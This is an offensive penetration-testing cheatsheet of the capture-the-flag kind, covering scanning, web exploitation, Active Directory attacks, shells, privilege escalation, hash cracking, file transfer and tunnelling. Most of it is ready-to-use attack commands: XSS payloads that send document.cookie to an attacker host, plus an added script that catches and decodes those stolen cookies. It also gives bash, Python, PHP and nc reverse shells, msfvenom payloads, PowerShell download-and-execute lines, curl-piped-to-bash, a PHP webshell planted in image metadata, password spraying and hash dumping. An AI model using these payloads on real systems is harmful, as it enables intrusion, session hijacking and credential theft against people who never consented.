~/cheatsheets/Cheatsheets
01 Recon & Scanning nmap · gobuster · ffuf · whatweb
Nmap — Essential Scans
$ nmap -sC -sV -oN scan.txt <IP>                  # default scripts + version detection, save output
$ nmap -p- --min-rate 5000 -T4 <IP>               # all 65535 TCP ports, fast
$ nmap -sU --top-ports 100 <IP>                   # UDP, top 100 ports
$ nmap -sV --script vuln <IP>                     # vulnerability detection scripts (noisy)
$ nmap -Pn -sV -sC -p 22,80,443,445,5985 <IP>     # skip host discovery, targeted ports
$ nmap -sn 10.10.10.0/24                          # ping sweep / host discovery
tip: run the full port scan (-p-) first, then -sC -sV only against the ports it found open; that is far faster than version-scanning all 65535
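The two-stage workflow from the tip, as an added example (not from the cheatsheet): the wrapper runs the -p- sweep with grepable output, pulls the open ports out of that file, and feeds only those to -sC -sV. It assumes nmap is on PATH and that the target is given as the first argument; the -oG sample inside demo_parse is constructed, not real scan output.

```bash
#!/usr/bin/env bash
# Added example: two-stage nmap wrapper (full sweep, then targeted scripts/version).
# Assumes nmap is on PATH. Usage: ./twostage.sh <IP> [outdir]

# Pull a sorted, comma-separated list of open TCP ports out of a grepable (-oG)
# nmap file. Open ports appear in the "Ports:" line as e.g. "22/open/tcp//ssh///".
open_ports_from_gnmap() {
  grep -oE '[0-9]+/open/tcp' "$1" 2>/dev/null | cut -d/ -f1 | sort -n -u | paste -sd, -
}

two_stage_scan() {
  local target=$1 outdir=${2:-scans} ports
  mkdir -p "$outdir"
  # Stage 1: every TCP port, fast, grepable output for parsing.
  nmap -p- --min-rate 5000 -T4 -oG "$outdir/allports.gnmap" "$target" >/dev/null || return 1
  ports=$(open_ports_from_gnmap "$outdir/allports.gnmap")
  if [ -z "$ports" ]; then
    echo "no open TCP ports found on $target (try -Pn or a lower --min-rate)" >&2
    return 1
  fi
  echo "[+] open TCP ports: $ports"
  # Stage 2: default scripts + version detection only on what is actually open.
  nmap -sC -sV -p "$ports" -oN "$outdir/targeted.txt" "$target"
}

# Offline check of the parser against a constructed -oG file (not real output).
demo_parse() {
  local f
  f=$(mktemp)
  cat >"$f" <<'EOF'
# Nmap 7.94 scan initiated (constructed sample)
Host: 10.10.10.5 ()  Status: Up
Host: 10.10.10.5 ()  Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 139/filtered/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 8080/open/tcp//http-proxy///  Ignored State: closed (65530)
EOF
  open_ports_from_gnmap "$f"
  rm -f "$f"
}

if [ $# -gt 0 ]; then
  two_stage_scan "$@"
fi
```

Filtered ports are deliberately left out of stage 2; if a service you expect is missing, rerun stage 1 with -Pn or a lower rate before assuming it is closed.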
Dir / Vhost Bruteforce
$ gobuster dir -u http://<IP> -w common.txt                                        # basic directory scan
$ gobuster dir -u http://<IP> -w raft-medium.txt -x php,html,txt,bak               # with extensions
$ gobuster vhost -u http://target.htb -w subdomains.txt --append-domain            # vhost enum
$ ffuf -w subdomains.txt -u http://target.htb -H 'Host: FUZZ.target.htb' -fs <size>   # vhost fuzz via the Host header (FUZZ in the URL would need DNS); -fs filters the default-vhost response size
$ ffuf -w params.txt -u 'http://target/page?FUZZ=val'                             # GET parameter fuzzing
$ feroxbuster -u http://<IP> -w common.txt --depth 3                               # recursive scan
DNS & Fingerprinting
$ dig ANY target.htb @<IP>          # all DNS records (many servers refuse ANY; fall back to A, NS, MX, TXT)
$ dig axfr target.htb @<IP>         # zone transfer
$ whatweb -a 3 http://<IP>          # aggressive web fingerprint
$ nikto -h http://<IP>              # web vuln scan
$ curl -I http://<IP>               # grab HTTP headers
02 Web Exploitation SQLi · LFI · XSS · SSRF · upload
SQL Injection
$ sqlmap -u 'http://target/?id=1' --dbs        # enumerate databases
$ sqlmap -u URL -D db -T users --dump          # dump a table
$ sqlmap -r req.txt --level 5 --risk 3         # from a saved Burp request
$ sqlmap -u URL --os-shell                     # attempt OS shell via SQLi (needs file-write privileges or stacked queries)
manual: ' OR 1=1-- -  |  ' AND SLEEP(5)-- -  |  ' UNION SELECT null,null-- -
LFI / Path Traversal
?page=../../../../etc/passwd                                     # basic traversal
?page=....//....//....//etc/passwd                               # bypass for filters that strip ../ once
?page=php://filter/convert.base64-encode/resource=index.php      # read PHP source (base64 so it is returned, not executed)
?page=../../../../windows/system32/drivers/etc/hosts             # Windows target
?page=\\<ATTACKER>\share\x                                       # UNC path → NTLMv2 capture (Windows hosts only)
rce via LFI: include /proc/self/environ, or poison a log you can write to (web access.log via User-Agent, SSH auth.log via the login username) and include it
File Upload Bypass
shell.php → shell.pHp / shell.php5 / shell.phtml                     # case / alternate extension bypass
shell.php → shell.php.jpg                                            # double extension
Content-Type: image/jpeg                                             # MIME type bypass, swap the header in Burp
$ exiftool -Comment='<?php system($_GET["cmd"]); ?>' img.jpg         # PHP in image metadata (needs an include/LFI to execute)
XSS & SSRF
<script>fetch('http://<IP>/?c='+document.cookie)</script>                   # cookie stealer
<img src=x onerror=this.src='http://<IP>/?'+btoa(document.cookie)>         # img tag XSS, cookie base64-encoded in the query
http://169.254.169.254/latest/meta-data/                                   # SSRF → AWS instance metadata (IMDSv1)
http://localhost:<port>/admin                                              # SSRF → internal services
$ nc -lvnp 80                                                              # catch XSS/SSRF callbacks
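What arrives at that listener is either ?c=<raw cookie> (the script payload) or ?<base64 of the cookie> (the img payload), percent-encoded by the browser. The decoder below is an added example, not part of the cheatsheet: it takes the request line nc prints, percent-decodes it, strips the c= prefix, and base64-decodes only when the result is printable text, so both payload forms come out as the plain cookie string. The request lines in the comments are constructed; the port and the c= parameter name are the ones the payloads above use.

```bash
#!/usr/bin/env bash
# Added example: decode cookies exfiltrated by the two XSS payloads above.

# Percent-decode a query string ("+" → space, %XX → byte).
urldecode() {
  local s=${1//+/ }
  printf '%b' "${s//%/\\x}"
}

# Given a request line such as
#   GET /?c=session%3Dabc HTTP/1.1      (script payload, raw cookie)
#   GET /?c2Vzc2lvbj1hYmM= HTTP/1.1     (img payload, btoa(cookie))
# print the cookie. Base64 is only accepted when the decoded bytes are all
# printable, so a raw cookie that happens to look like base64 is left alone.
decode_exfil() {
  local line=$1 query value decoded
  query=${line#* /\?}        # drop "GET /?"
  query=${query%% *}         # drop " HTTP/1.1"
  value=$(urldecode "$query")
  value=${value#c=}          # ?c=<cookie> form
  if decoded=$(printf '%s' "$value" | base64 -d 2>/dev/null) \
     && [ -n "$decoded" ] \
     && ! printf '%s' "$decoded" | LC_ALL=C grep -q '[^[:print:]]'; then
    printf '%s\n' "$decoded"
  else
    printf '%s\n' "$value"
  fi
}

# Listener loop: print the decoded cookie for every GET that hits the port.
# No HTTP response is sent, so the victim browser waits until it times out;
# that is fine for a one-shot cookie grab.
catch_exfil() {
  local port=${1:-80}
  while :; do
    nc -lvnp "$port" 2>/dev/null | while IFS= read -r line; do
      case $line in GET*) decode_exfil "$line" ;; esac
    done
  done
}
```

Run `catch_exfil 80` on the attacker box in place of the bare nc listener; the decoder can also be fed a saved nc transcript line by line.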
03 SMB / Active Directory impacket · crackmapexec · bloodhound · kerbrute
SMB Enumeration
$ smbclient -L //<IP> -N                                                   # list shares (null session)
$ smbclient //<IP>/share -U user                                           # connect to a share
$ crackmapexec smb <IP> -u user -p pass --shares                           # list shares, authenticated
$ crackmapexec smb <IP> -u users.txt -p 'Pass123!' --continue-on-success   # password spray (check the lockout policy first)
$ enum4linux-ng -A <IP>                                                    # full enum (users, shares, policies)
$ smbmap -H <IP> -u anonymous                                              # check share permissions
Kerberos Attacks
$ kerbrute userenum -d domain.local --dc <IP> users.txt                            # validate usernames
$ impacket-GetUserSPNs domain/user:pass -dc-ip <IP> -request                       # Kerberoasting (needs valid creds)
$ impacket-GetNPUsers domain/ -usersfile users.txt -dc-ip <IP> -format hashcat     # AS-REP roasting (no creds needed)
$ impacket-secretsdump domain/user:pass@<IP>                                       # dump hashes (needs admin rights)
$ evil-winrm -i <IP> -u user -p pass                                               # WinRM shell
$ evil-winrm -i <IP> -u user -H <NTLM-hash>                                        # pass-the-hash
BloodHound Collection
$ bloodhound-python -d domain.local -u user -p pass -ns <IP> -c all        # collect all
$ ldapsearch -x -H ldap://<IP> -b 'DC=domain,DC=local'                      # LDAP anonymous enum
cypher: MATCH p=(u:User {owned:true})-[:MemberOf|AdminTo*1..]->(n) RETURN p   # groups and machines reachable from owned users (AdminTo ends on computers, not groups)
NTLMv2 Capture
$ responder -I tun0 -rdw                    # LLMNR/NBT-NS poisoning
$ hashcat -m 5600 hash.txt rockyou.txt      # crack NetNTLMv2 (what Responder captures)
$ hashcat -m 1000 hash.txt rockyou.txt      # crack NTLM (from secretsdump, not from Responder)
trigger without LLMNR: make the target authenticate to \\<IP>\share via an include/LFI, any file-path parameter the server resolves, or a UNC path planted in a document or shortcut
04 Shells & Payloads revshells · stabilization · msfvenom
Reverse Shells — Linux
$ rlwrap nc -lvnp 4444                                                                 # listener (rlwrap = arrow keys / history)
bash -c 'bash -i >& /dev/tcp/<IP>/4444 0>&1'                                           # bash TCP
python3 -c "import os,pty,socket;s=socket.socket();s.connect(('<IP>',4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn('/bin/bash')"   # python3
php -r '$s=fsockopen("<IP>",4444);exec("/bin/bash -i <&3 >&3 2>&3");'                # PHP (assumes the socket lands on fd 3)
nc <IP> 4444 | /bin/bash | nc <IP> 4445                                                # nc without -e: two listeners, 4444 for input and 4445 for output
Shell Stabilization (TTY)
$ python3 -c 'import pty;pty.spawn("/bin/bash")'     # step 1: upgrade to a PTY (in the victim shell)
Ctrl+Z → stty raw -echo; fg                          # step 2: raw mode (in your own terminal), then press Enter
$ export TERM=xterm; stty rows 50 columns 200        # step 3: back in the victim shell, fix terminal type and size (match your own `stty size`)
alternative: socat gives a fully interactive TTY from the start, which is cleaner
Windows Payloads
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f exe -o shell.exe     # x64 exe
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f aspx -o shell.aspx   # ASPX
> certutil -urlcache -f http://<IP>/shell.exe shell.exe                                   # download via certutil
> powershell "IEX(New-Object Net.WebClient).DownloadString('http://<IP>/shell.ps1')"      # PowerShell download + exec in memory
05 Privilege Escalation linpeas · winpeas · GTFOBins · SUID
Linux Enum
$ sudo -l                                        # what can we run with sudo?
$ find / -perm -u=s -type f 2>/dev/null          # SUID binaries
$ cat /etc/crontab; ls /etc/cron*                # cron jobs
$ ss -tulnp                                      # listening ports (internal services)
$ curl http://<IP>/linpeas.sh | bash             # run LinPEAS
$ grep -E 'sh$' /etc/passwd                      # users with a login shell
GTFOBins Escapes
# vim
sudo vim -c ':!/bin/bash'                              # vim escape
# find (SUID)
find . -exec /bin/bash -p \;                           # SUID find escape (-p keeps the effective uid)
# python / awk
sudo python3 -c 'import os;os.system("/bin/bash")'     # python escape
sudo awk 'BEGIN{system("/bin/bash")}'                  # awk escape
gtfobins.github.io — escape techniques for every binary
Windows PrivEsc
> whoami /priv                                              # current privileges
> net user & net localgroup administrators                  # users and local admins
> schtasks /query /fo LIST /v                               # scheduled tasks
PS> iwr http://<IP>/winpeas.exe -OutFile wp.exe; .\wp.exe   # WinPEAS
SeImpersonatePrivilege → JuicyPotato / PrintSpoofer / GodPotato (pick by OS version)
06 Hashes & Credentials hashcat · john · hydra · hashid
Hashcat Modes
$ hashcat -m 0 hash.txt rockyou.txt        # MD5
$ hashcat -m 100 hash.txt rockyou.txt      # SHA1
$ hashcat -m 1000 hash.txt rockyou.txt     # NTLM
$ hashcat -m 5600 hash.txt rockyou.txt     # NetNTLMv2
$ hashcat -m 13100 hash.txt rockyou.txt    # Kerberoast TGS-REP (RC4, etype 23)
$ hashcat -m 18200 hash.txt rockyou.txt    # AS-REP roast (RC4, etype 23)
$ hashcat -m 1800 hash.txt rockyou.txt     # sha512crypt ($6$)
$ hashcat -m 3200 hash.txt rockyou.txt     # bcrypt
$ hashid '<hash>'                          # identify hash type (hashcat --identify does the same)
Hydra Bruteforce
$ hydra -l admin -P rockyou.txt ssh://<IP>                                                        # SSH
$ hydra -l admin -P rockyou.txt ftp://<IP>                                                        # FTP
$ hydra -l admin -P rockyou.txt <IP> http-post-form "/login:user=^USER^&pass=^PASS^:F=invalid"   # HTTP form (F= is the failure string in the response)
$ hydra -L users.txt -P pass.txt -t 4 smb://<IP>                                                  # SMB (low -t to avoid lockouts)
07 File Transfer http · smb · nc · base64
Serve Files (Attacker)
$ python3 -m http.server 80                     # quick HTTP server
$ impacket-smbserver share . -smb2support       # SMB share of the current directory
$ nc -lvnp 4444 < file.txt                      # send via nc (victim: nc <ATTACKER> 4444 > file.txt)
Download Files (Victim)
$ wget http://<IP>/file -O /tmp/file            # wget
$ curl http://<IP>/file -o /tmp/file            # curl
> copy \\<IP>\share\file.exe .                   # Windows: copy from the attacker's SMB share
$ base64 -w0 file                                # terminal-only transfer: encode on one side, paste the output on the other...
$ echo '<b64>' | base64 -d > file                # ...and decode; compare md5sum on both ends to catch a truncated paste
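Pasting base64 through a shell is where files silently get truncated, so the transfer is only done when the hash matches. The pair of functions below is an added example, not from the cheatsheet: b64_pack prints the sha256 of the file followed by wrapped base64 (attacker side), and b64_unpack reads that paste from stdin, rebuilds the file and deletes it again if the hash does not match (victim side). It assumes GNU coreutils (base64 -w, sha256sum) on both ends; the file in demo_roundtrip is constructed.

```bash
#!/usr/bin/env bash
# Added example: base64 file transfer over a terminal with an integrity check.
# Assumes GNU coreutils base64 and sha256sum on both sides.

# Attacker: print "# sha256: <hash>" then the file as base64 wrapped at $width
# columns, ready to paste into the victim shell.
b64_pack() {
  local file=$1 width=${2:-76}
  echo "# sha256: $(sha256sum "$file" | cut -d' ' -f1)"
  base64 -w"$width" "$file"
}

# Victim: read the pasted text from stdin, write the decoded file to $1 and
# verify it. On mismatch (or undecodable input) the output is removed and the
# function returns 1, so a truncated paste never gets executed.
b64_unpack() {
  local out=$1 blob expected actual
  blob=$(cat)
  expected=$(printf '%s\n' "$blob" | sed -n 's/^# sha256: //p' | head -n1)
  printf '%s\n' "$blob" | grep -v '^#' | base64 -d > "$out" 2>/dev/null || { rm -f "$out"; return 1; }
  actual=$(sha256sum "$out" | cut -d' ' -f1)
  if [ -n "$expected" ] && [ "$actual" = "$expected" ]; then
    echo "[+] $out ok ($actual)"
  else
    echo "[-] hash mismatch for $out: got $actual, expected ${expected:-<none>}" >&2
    rm -f "$out"
    return 1
  fi
}

# Offline round trip on a constructed sample; prints "ok" or "fail".
demo_roundtrip() {
  local src dst rc=0
  src=$(mktemp); dst=$(mktemp)
  printf 'constructed sample payload %s\n' "$(seq 1 200 | tr '\n' ' ')" > "$src"
  b64_pack "$src" | b64_unpack "$dst" >/dev/null || rc=1
  if [ "$rc" -eq 0 ] && cmp -s "$src" "$dst"; then echo ok; else echo fail; fi
  rm -f "$src" "$dst"
}
```

In practice: `b64_pack shell.elf` on the attacker box, select and copy the whole output, then on the victim `b64_unpack /tmp/shell.elf` followed by the paste and Ctrl+D.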
08 Pivoting & Tunneling ssh · chisel · ligolo · proxychains
SSH Tunnels
$ ssh -L 8080:127.0.0.1:80 user@<IP>              # local forward: attacker :8080 → victim 127.0.0.1:80
$ ssh -R 4444:127.0.0.1:4444 user@<ATTACKER>      # remote forward (run from the victim): attacker :4444 → victim :4444
$ ssh -D 1080 user@<IP>                           # dynamic SOCKS proxy on 127.0.0.1:1080
$ proxychains nmap -sT -Pn 10.10.10.0/24          # scan through the proxy (connect scan only; no raw sockets or ICMP over SOCKS)
Chisel
# attacker
$ ./chisel server -p 8000 --reverse                        # start server, allow reverse tunnels
# victim
$ ./chisel client <ATTACKER>:8000 R:socks                  # reverse SOCKS5 proxy, listens on attacker 127.0.0.1:1080
$ ./chisel client <ATTACKER>:8000 R:80:127.0.0.1:80        # forward victim 127.0.0.1:80 to attacker :80
then: set "socks5 127.0.0.1 1080" in /etc/proxychains4.conf and prefix tools with proxychains